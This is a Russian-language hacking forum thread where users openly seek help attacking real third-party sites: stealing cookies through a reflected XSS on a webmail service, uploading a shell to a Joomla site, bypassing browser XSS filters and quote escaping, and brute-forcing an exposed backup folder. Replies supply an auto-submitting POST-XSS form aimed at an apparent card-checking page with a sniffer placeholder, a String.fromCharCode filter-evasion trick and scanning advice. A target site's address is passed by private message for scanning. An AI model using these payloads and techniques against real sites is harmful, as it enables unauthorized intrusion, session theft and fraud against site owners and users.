Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Вопрос номер раз:
    Есть ли где подробное описание, как использовать post xss (никак не могу разобраться... есть пассивка на почтовике, где в строке поиска нужно ввести скрипт и нажать enter - как на практике ей угнать кукисы?)

    Вопрос номер два как можно зaлить шелл (сайт на джyмлe 1.7)? Jskу нашел там вот что:
    Code:
    Possible secsitive directories - 1125
    Directories with EXECUTE permission enabled - 17
    Possible sensitive files - 15
    Directory backup check - 16
    File backup check - 274
    
     
  2. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    не было времени) спал я)
    а счас в универе
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    Code:
    <html>
    <body onload="document.getElementById('poc').submit();">
    <form id="poc" method="POST" action="http://site.com/addvbv.php" onSubmit="return false;">
    	<input type="hidden" name=ccn value='[тут сниф]'>
    	<input type="hidden" name=capt value=''>
    	<input type="hidden" name=submit value="Check Now"> <!
    name=submit -->
    </form>
    </body>
    </html>
    как-нибудь так

    ты хотя бы перевел, что он там нашел?
     
    _________________________
  4. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Попробую

    Я сам не особо понимаю, он весь на английском, Possible secsitive directories насколько я понимаю "Возможно открытая директория"
     
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    нужно понимание того, что выдает тебе сканер, чтобы потом спрашивать «а можно…»
    http://translate.google.ru/
     
    _________________________
  6. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Технический перевод
    HTML:
    Возможные secsitive каталоги - 1125
    Каталоги с поддержкой разрешения на выполнение - 17
    Возможны важные файлы - 15
    Каталог резервной проверки - 16
    Файл резервной проверки - 274
    Просто я полагаю в джумлe есть какие-то более-менее универсальные уязвимости?
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    http://forum.antichat.ru/thread50600.html
     
    _________________________
  8. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Да, я там многие вещи пробовал, но ничего особо не получилось. Там для специальных компонентов джумлы, а я понятия не имею какие на том сайте есть компоненты.
     
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    кто ж тебе открыть сайт мешает и полистать? :)
     
    _________________________
  10. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Листаю, там в коде есть только component/mailto
    и несколько users-components (remind pass итп)
    Как-то еще можно проверить, какие компоненты там есть? Сайт довольно простой, не думаю что какие-то модули сверх навороченые туда ставились
     
  11. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    скинь адрес сайта
     
  12. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    в личку скинул
     
  13. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Из 68 компонент только компонент Content (com_content) найден. База данных сканера небольшая, надо будет потом обновить его.

    update: + com_users
     
    #19493 R0nin, 28 Feb 2012
    Last edited: 28 Feb 2012
  14. jacklndn

    jacklndn New Member

    Joined:
    20 Feb 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Все облазил, но ничего так и не нашел что помогло бы залить шелл.

    Еще отдельный вопрос о xss пассивке для почтовика.
    post xss не хочет работать, однако добрый человек подсказал как вывести ее в get параметр. Но теперь она отказывается работать в ie и хроме. Если хром, это не фатально, то вот с ие очень хотелось чтобы xss работала. Есть ли варианты обойти фильтры ие?
     
  15. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Такая вот она жизнь мужик, приходится всякие фильтры обходить)
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    532
    Reputations:
    935
    линку в личку
     
    _________________________
  17. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    пытаюсь намутить активную xss на одном сайте. текст сообщения пишется в js скрипт. ковычки " экранируются слешем. есть варианты обхода?
     
  18. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Если JS пропускается то кавычки не нужны, потому что есть волшебный метод fromCharCode() объекта String.

    Code:
    document.write(String.fromCharCode(65,66,67,68));
    Результат будет: ABCD
     
  19. JorryGo

    JorryGo New Member

    Joined:
    12 Sep 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Есть на одном сайтике папка backup не закрытая.
    Не подскажите как могут храниться бекапы? Ничего на эту тему в гугле не нашел.
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    JorryGo, не факт что в ней может что-то лежать.
    а бэкап от какого-нибудь движка, типа булки, то просто заебешься брутить.
    ну а так dirbuster-ом на брут поставь папку
     
    _________________________
Loading...
Thread Status:
Not open for further replies.